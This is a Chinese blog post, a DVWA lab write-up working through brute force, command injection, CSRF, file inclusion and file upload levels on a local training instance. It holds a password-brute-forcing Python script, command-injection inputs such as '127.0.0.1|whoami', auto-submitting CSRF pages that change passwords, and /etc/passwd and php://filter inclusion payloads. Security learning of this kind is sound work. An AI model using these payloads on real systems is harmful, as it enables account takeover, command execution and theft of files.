<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="-web -DVWA," />





  <link rel="alternate" href="/atom.xml" title="mrl64's Blog" type="application/atom+xml" />






<meta name="description" content="前言粗略学习过http协议的相关内容，接下来就是刷靶场的环节了。DVWA涵盖了多种常见的web漏洞供我们练习，综合性较强。0x持续更新中x0">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA练习">
<meta property="og:url" content="http://example.com/2021/12/08/DVWA%E7%BB%83%E4%B9%A0/index.html">
<meta property="og:site_name" content="mrl64&#39;s Blog">
<meta property="og:description" content="前言粗略学习过http协议的相关内容，接下来就是刷靶场的环节了。DVWA涵盖了多种常见的web漏洞供我们练习，综合性较强。0x持续更新中x0">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/wAUPouxi3Dkb2dZ.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/k4lYM73VOZfshaE.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/1zCdgPKqQxYJTm2.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/z8iLHdcjUIN1SA7.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/1GJWduQ9EOI3URc.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/xlm4VpBtoKbTIaj.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/12/cCXwfUnJKNPdxzD.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/12/qrgedSGpwZMX51t.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/13/dxKth9WjNbAeZJm.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/13/SdzlJx8ZLsfvoXa.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/13/RefnFP4BTZD7hou.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/13/zsTHl4VN5SxYuyw.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/13/HDWCy48nJsYaBNw.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/13/49wJGjsLXAYF1eQ.png">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2021/12/98e805e5a64a1640.png">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2021/12/636118ac9e7c89b4.png">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2021/12/d3ef0a5df4796d92.png">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2021/12/7dd903480511de87.png">
<meta property="article:published_time" content="2021-12-08T12:43:20.000Z">
<meta property="article:modified_time" content="2021-12-13T12:48:44.142Z">
<meta property="article:author" content="liszt_lin">
<meta property="article:tag" content="-web -DVWA">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2021/12/09/wAUPouxi3Dkb2dZ.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2021/12/08/DVWA练习/"/>





  <title>DVWA练习 | mrl64's Blog</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">mrl64's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/12/08/DVWA%E7%BB%83%E4%B9%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="mrl64's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">DVWA练习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-12-08T20:43:20+08:00">
                2021-12-08
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>粗略学习过http协议的相关内容，接下来就是刷靶场的环节了。DVWA涵盖了多种常见的web漏洞供我们练习，综合性较强。<br>0x持续更新中x0</p>
</blockquote>
<span id="more"></span>

<h1 id="Brute-Force"><a href="#Brute-Force" class="headerlink" title="Brute Force"></a>Brute Force</h1><h2 id="low"><a href="#low" class="headerlink" title="low"></a>low</h2><p>根据题目的意思，这题的考点为暴力破解，那么我们将username设置为admin，接着使用burp suite的字典爆破功能爆破出密码就可以了。</p>
<p>或者我们查看源码发现，后端对password进行了md5加密，但是对username没有进行防御，因此我们在username部分进行sql注入也是可以的。</p>
<h2 id="medium"><a href="#medium" class="headerlink" title="medium"></a>medium</h2><p>这次在源码中username和password都使用了mysqli_real_escape_string()函数进行过滤，将一些特殊字符进行了转义，因此sql注入变得相当困难。</p>
<p>不过由于没有验证cookie等头文件，因此我们仍然可以进行字典爆破。</p>
<h2 id="high"><a href="#high" class="headerlink" title="high"></a>high</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if( isset( $_GET[ &#x27;Login&#x27; ] ) ) &#123;</span><br><span class="line">    // Check Anti-CSRF token</span><br><span class="line">    checkToken( $_REQUEST[ &#x27;user_token&#x27; ], $_SESSION[ &#x27;session_token&#x27; ], &#x27;index.php&#x27; ); </span><br></pre></td></tr></table></figure>
<p>在high难度下加入了anti-csrf来随机获取token，并且在每一次登录时都要对token进行检查，因此直接进行字典爆破是无法解开这题的,这里我们对Intruder进行设置：</p>
<p>首先将请求头发送至Intruder中，设置好我们要进行爆破的内容为password与user_token，并且将攻击类型设置为Pitchfork。<br><img src="https://s2.loli.net/2021/12/09/wAUPouxi3Dkb2dZ.png"></p>
<p>接着在Options中找到Grep-Extract，选择Add，先点击一次Refetch response，接着再复制下面返回中的user_token的值，点击ok保存。<br><img src="https://s2.loli.net/2021/12/09/k4lYM73VOZfshaE.png"><br><img src="https://s2.loli.net/2021/12/09/1zCdgPKqQxYJTm2.png"></p>
<p>然后回到Payload，Payload set首先为1，设置我们要用来爆破的字典，再将Payload set设为2，选择Recursive grep，并进行设置：<br><img src="https://s2.loli.net/2021/12/09/z8iLHdcjUIN1SA7.png"></p>
<p>设置完之后就可以进行攻击了，如果出现报错提醒可以去检查设置的线程是否为1，如果不为1则将线程改为1，最后效果：<br><img src="https://s2.loli.net/2021/12/09/1GJWduQ9EOI3URc.png"></p>
<p>当然这题通过编写python脚本也可以解出，但是由于这个脚本对我来说还是复杂了，就先贴一个网上的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">from bs4 import BeautifulSoup</span><br><span class="line">import requests</span><br><span class="line"> </span><br><span class="line">header=&#123;&#x27;Host&#x27;:&#x27;127.0.0.1&#x27;,</span><br><span class="line">        &#x27;User-Agent&#x27;:&#x27;Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0&#x27;,</span><br><span class="line">        &#x27;Accept&#x27;:&#x27;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&#x27;,</span><br><span class="line">        &#x27;Accept-Language&#x27;:&#x27;zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3&#x27;,</span><br><span class="line">        &#x27;Referer&#x27;:&#x27;http://127.0.0.1/vulnerabilities/brute/&#x27;,</span><br><span class="line">        &#x27;cookie&#x27;:&#x27;PHPSESSID=8p4kb7jc1df431lo6qe249quv2; security=high&#x27;,</span><br><span class="line">        &#x27;Connection&#x27;:&#x27;close&#x27;,</span><br><span class="line">        &#x27;Upgrade-Insecure-Requests&#x27;:&#x27;1&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">requrl=&quot;http://127.0.0.1/vulnerabilities/brute/&quot;</span><br><span class="line"> </span><br><span class="line">def get_token(requrl,header):</span><br><span class="line">    response=requests.get(url=requrl,headers=header)</span><br><span class="line">    print (response.status_code,len(response.content))</span><br><span class="line">    soup=BeautifulSoup(response.text,&quot;html.parser&quot;)</span><br><span class="line">    input=soup.form.select(&quot;input[type=&#x27;hidden&#x27;]&quot;)   #返回的是一个list列表</span><br><span class="line">    user_token=input[0][&#x27;value&#x27;]                   #获取用户的token</span><br><span class="line">    return user_token</span><br><span class="line"> </span><br><span class="line">user_token=get_token(requrl,header)</span><br><span class="line">i=0</span><br><span class="line">for line in open(&quot;E:\Password\mima.txt&quot;):</span><br><span class="line">    requrl=&quot;http://127.0.0.1/vulnerabilities/brute/?username=admin&amp;password=&quot;+line.strip()+&quot;&amp;Login=Login&amp;user_token=&quot;+user_token</span><br><span class="line">    i=i+1</span><br><span class="line">    print (i , &#x27;admin&#x27; ,line.strip(),end=&quot;  &quot;)</span><br><span class="line">    user_token=get_token(requrl,header)</span><br><span class="line">    if(i==20):</span><br><span class="line">        break</span><br></pre></td></tr></table></figure>

<h2 id="impossible"><a href="#impossible" class="headerlink" title="impossible"></a>impossible</h2><p>impossible在High的基础上还设置了验证次数，当输入密码错误3次时必须等待15分钟后才能再次输入。因此，当对验证次数进行限制或者添加验证码等情况发生时，暴力破解的方法将被排除。</p>
<h1 id="Command-Injection"><a href="#Command-Injection" class="headerlink" title="Command Injection"></a>Command Injection</h1><ul>
<li>在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”，修改”charset=gb2312”，即可解决文字乱码问题。</li>
</ul>
<p>在练习攻防世界时就有介绍过一些命令注入了。那我们还是先来回顾下linux的命令拼接符号：</p>
<ul>
<li>A;B     A不论正确与否都会执行B命令</li>
<li>A&amp;B     A后台运行；A和B同时执行</li>
<li>A&amp;&amp;B     A执行成功时候才会执行B命令</li>
<li>A|B     A执行的输出结果，作为B命令的参数，A不论正确与否都会执行B命令</li>
<li>A||B     A 执行失败后才会执行B命令</li>
</ul>
<h2 id="low-1"><a href="#low-1" class="headerlink" title="low"></a>low</h2><p>low难度都是没有进行过滤的，因此我们可以直接构造各种命令进行注入，这里拿<code>127.0.0.1&amp;&amp;whoami</code>举例:<br><img src="https://s2.loli.net/2021/12/09/xlm4VpBtoKbTIaj.png"></p>
<h2 id="medium-1"><a href="#medium-1" class="headerlink" title="medium"></a>medium</h2><p>在这个难度下过滤了<code>&amp;&amp;</code>与<code>;</code>，不过由于本质上是黑名单机制，因此还是存在漏洞，我们只需要利用上面没有被过滤的命令拼接符号就可以了。<br>例如：<code>127.0.0.1&amp;whoami</code></p>
<h2 id="high-1"><a href="#high-1" class="headerlink" title="high"></a>high</h2><p>这里的过滤就比较狠了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">if( isset( $_POST[ &#x27;Submit&#x27; ]  ) ) &#123;</span><br><span class="line">    // Get input</span><br><span class="line">    $target = trim($_REQUEST[ &#x27;ip&#x27; ]);</span><br><span class="line"></span><br><span class="line">    // Set blacklist</span><br><span class="line">    $substitutions = array(</span><br><span class="line">        &#x27;&amp;&#x27;  =&gt; &#x27;&#x27;,</span><br><span class="line">        &#x27;;&#x27;  =&gt; &#x27;&#x27;,</span><br><span class="line">        &#x27;| &#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">        &#x27;-&#x27;  =&gt; &#x27;&#x27;,</span><br><span class="line">        &#x27;$&#x27;  =&gt; &#x27;&#x27;,</span><br><span class="line">        &#x27;(&#x27;  =&gt; &#x27;&#x27;,</span><br><span class="line">        &#x27;)&#x27;  =&gt; &#x27;&#x27;,</span><br><span class="line">        &#x27;`&#x27;  =&gt; &#x27;&#x27;,</span><br><span class="line">        &#x27;||&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    // Remove any of the charactars in the array (blacklist).</span><br><span class="line">    $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); </span><br></pre></td></tr></table></figure>

<p>我们可以看到这差不多是过滤干净了，不过这里我们发现在过滤<code>|</code>时真正过滤的是<code>| </code>，这个后面是有一个空格的，因此，我们构造<code>127.0.0.1|whoami</code>就可以绕过了。</p>
<h2 id="impossible-1"><a href="#impossible-1" class="headerlink" title="impossible"></a>impossible</h2><p>采用了白名单的写法，不仅加入了user_token进行认证，而且还检测被<code>.</code>分割的各个部分是否为数字，如果不为数字类型则返回error。在进行过滤的设置时，白名单的安全性还是比很名单要高很多的。</p>
<h1 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h1><h2 id="low-2"><a href="#low-2" class="headerlink" title="low"></a>low</h2><p>我们修改密码后发现发送的是GET请求，URL如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=password&amp;password_conf=password&amp;Change=Change#</span><br></pre></td></tr></table></figure>

<p>因此我们可以直接构造一个URL，点击之后便可以直接修改密码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=mrl64&amp;password_conf=mrl64&amp;Change=Change#</span><br></pre></td></tr></table></figure>

<p>当然在进行CSRF攻击时肯定不能如此直白地攻击，因此我们可以套一个短域名进行伪装，或者编写HTML代码，并将攻击用的URL藏匿起来。如果要编写HTML进行攻击的话，只要标签支持src都可以尝试进行藏匿，比较常用的有scirpt、iframe以及img：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;CSRF&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;img src=&quot;http://127.0.0.1/vulnerabilities/csrf/?password_new=mrl64&amp;password_conf=mrl64&amp;Change=Change#&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;!--&lt;iframe src=&quot;http://127.0.0.1/vulnerabilities/csrf/?password_new=mrl64&amp;password_conf=mrl64&amp;Change=Change#&quot; style=&quot;display:none;&quot;&gt;&lt;/iframe&gt;--&gt;</span><br><span class="line"></span><br><span class="line">&lt;!--&lt;script src=&quot;http://127.0.0.1/vulnerabilities/csrf/?password_new=mrl64&amp;password_conf=mrl64&amp;Change=Change#&quot;&gt;&lt;/script&gt;--&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<h2 id="medium-2"><a href="#medium-2" class="headerlink" title="medium"></a>medium</h2><p>这个难度下多进行了一次Referer的比较判断：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if( stripos( $_SERVER[ &#x27;HTTP_REFERER&#x27; ] ,$_SERVER[ &#x27;SERVER_NAME&#x27; ]) !== false )</span><br></pre></td></tr></table></figure>
<p>spripos(string,find[,start])：从start位置开始查找find中string第一次出现的位置</p>
<p>因此我们需要对Referer的值进行校正，在本地环境下自然可以用burp suite工具抓包更改请求头，但是实战中不会有人好心帮你更改Referer的。因此我们需要构建表单来进行绕过：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">    &lt;title&gt;CSRF&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"> </span><br><span class="line">&lt;form method=&quot;get&quot; id=&quot;csrf&quot; action=&quot;http://127.0.0.1/vulnerabilities/csrf/&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;password_new&quot; value=&quot;mrl64&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;password_conf&quot; value=&quot;mrl64&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;Change&quot; value=&quot;Change&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;script&gt; document.forms[&quot;csrf&quot;].submit(); &lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>这里用到了<code>&lt;script&gt; document.forms[&quot;csrf&quot;].submit(); &lt;/script&gt;</code>进行了对id为csrf表单的自动提交</p>
<p>最后让用户访问url并自动提交即可：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">目录混淆法：将HTML页面放在127.0.0.1目录下，构建payload</span><br><span class="line">http://www.mrl64.com/127.0.0.1/csrf.html</span><br><span class="line"></span><br><span class="line">文件名混淆法：将HTML文件重命名为127.0.0.1，构建payload</span><br><span class="line">http://www.mrl64.com/127.0.0.1.html</span><br><span class="line"></span><br><span class="line">问号拼接法：由于HTML不接受参数，因此随便输入都可以绕过referer检测</span><br><span class="line">http://www.mrl64.com/csrf.html?mrl64</span><br><span class="line">……</span><br></pre></td></tr></table></figure>

<h2 id="high-2"><a href="#high-2" class="headerlink" title="high"></a>high</h2><p>这关增加了token检测，我们必须要获取用户的token才能进行攻击。但是由于HTML不可跨域，因此我们无法直接使用JS脚本获取token。因此这里必须结合XSS漏洞来解题。等做到DOM XSS时再返回一起讲这题解决。</p>
<h2 id="impossible-2"><a href="#impossible-2" class="headerlink" title="impossible"></a>impossible</h2><p>增加了验证初始密码的选项，这在现实中是非常常见的保护机制，同样还可以使用验证码等其他方式进行保护，在这些情况下CSRF攻击是无法发起的。</p>
<h1 id="File-Inclusion"><a href="#File-Inclusion" class="headerlink" title="File Inclusion"></a>File Inclusion</h1><h2 id="low-3"><a href="#low-3" class="headerlink" title="low"></a>low</h2><p>经典文件包含题目，在low等级完全没有过滤的情况下，我们利用文件包含漏洞可以做许多的事：</p>
<ul>
<li>读取文件：<code>http://127.0.0.1/DVWA/vulnerabilities/fi/?page=/etc/passwd（linux限定）</code></li>
<li>远程文件包含：<code>http://127.0.0.1/DVWA/vulnerabilities/fi/?page=www.baidu.com/robots.txt</code></li>
<li>本地/远程文件包含Getshell</li>
<li>伪协议使用：<code>http://127.0.0.1/DVWA/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=index.php</code></li>
<li>……</li>
</ul>
<h2 id="medium-3"><a href="#medium-3" class="headerlink" title="medium"></a>medium</h2><p>增加了对<code>http://</code>、<code>https://</code>、<code>../</code>、<code>..\</code>的过滤，但是过滤的方法是使用str_replace()函数，而且没有区分大小写，因此双写过滤与大小写过滤均可使用。</p>
<p>例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=hthttptps://www.mrl64.com/csrf.html</span><br></pre></td></tr></table></figure>

<h2 id="high-3"><a href="#high-3" class="headerlink" title="high"></a>high</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if( !fnmatch( &quot;file*&quot;, $file ) &amp;&amp; $file != &quot;include.php&quot; ) &#123;</span><br><span class="line">    // This isn&#x27;t the page we want!</span><br><span class="line">    echo &quot;ERROR: File not found!&quot;;</span><br><span class="line">    exit;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>
<p>这里要求匹配page参数的开头必须是file，否则执行exit结束程序，因此这里只能读取文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///etc/passwd</span><br></pre></td></tr></table></figure>

<h2 id="impossible-3"><a href="#impossible-3" class="headerlink" title="impossible"></a>impossible</h2><p>无懈可击的白名单匹配，不愧是一生之敌。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">// The page we wish to display</span><br><span class="line">$file = $_GET[ &#x27;page&#x27; ];</span><br><span class="line"></span><br><span class="line">// Only allow include.php or file&#123;1..3&#125;.php</span><br><span class="line">if( $file != &quot;include.php&quot; &amp;&amp; $file != &quot;file1.php&quot; &amp;&amp; $file != &quot;file2.php&quot; &amp;&amp; $file != &quot;file3.php&quot; ) &#123;</span><br><span class="line">    // This isn&#x27;t the page we want!</span><br><span class="line">    echo &quot;ERROR: File not found!&quot;;</span><br><span class="line">    exit;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<h1 id="File-Upload"><a href="#File-Upload" class="headerlink" title="File Upload"></a>File Upload</h1><h2 id="low-4"><a href="#low-4" class="headerlink" title="low"></a>low</h2><p>刷了upload-labs做这个就是洒洒水啦。首先low难度下对文件后缀没有进行任何过滤，因此直接上传muma1.php（<code>&lt;?php phpinfo();?&gt;</code>）文件就可以了，并且返回了路径地址，因此直接访问。<br><img src="https://s2.loli.net/2021/12/12/cCXwfUnJKNPdxzD.png"></p>
<h2 id="medium-4"><a href="#medium-4" class="headerlink" title="medium"></a>medium</h2><p>upload-labs前两关的难度，上传jpg后改为php或者上传php并修改Content-Type都可以绕过检测：<br><img src="https://s2.loli.net/2021/12/12/qrgedSGpwZMX51t.png"></p>
<h2 id="high-4"><a href="#high-4" class="headerlink" title="high"></a>high</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">// File information</span><br><span class="line">$uploaded_name = $_FILES[ &#x27;uploaded&#x27; ][ &#x27;name&#x27; ];</span><br><span class="line">$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, &#x27;.&#x27; ) + 1);</span><br><span class="line">$uploaded_size = $_FILES[ &#x27;uploaded&#x27; ][ &#x27;size&#x27; ];</span><br><span class="line">$uploaded_tmp  = $_FILES[ &#x27;uploaded&#x27; ][ &#x27;tmp_name&#x27; ];</span><br><span class="line"></span><br><span class="line">// Is it an image?</span><br><span class="line">if( ( strtolower( $uploaded_ext ) == &quot;jpg&quot; || strtolower( $uploaded_ext ) == &quot;jpeg&quot; || strtolower( $uploaded_ext ) == &quot;png&quot; ) &amp;&amp;</span><br><span class="line">    ( $uploaded_size &lt; 100000 ) &amp;&amp;</span><br><span class="line">    getimagesize( $uploaded_tmp ) ) &#123;</span><br></pre></td></tr></table></figure>

<p>这里就只能上传图片了，因此我们要用到图片码，配合伪协议读取就行了。</p>
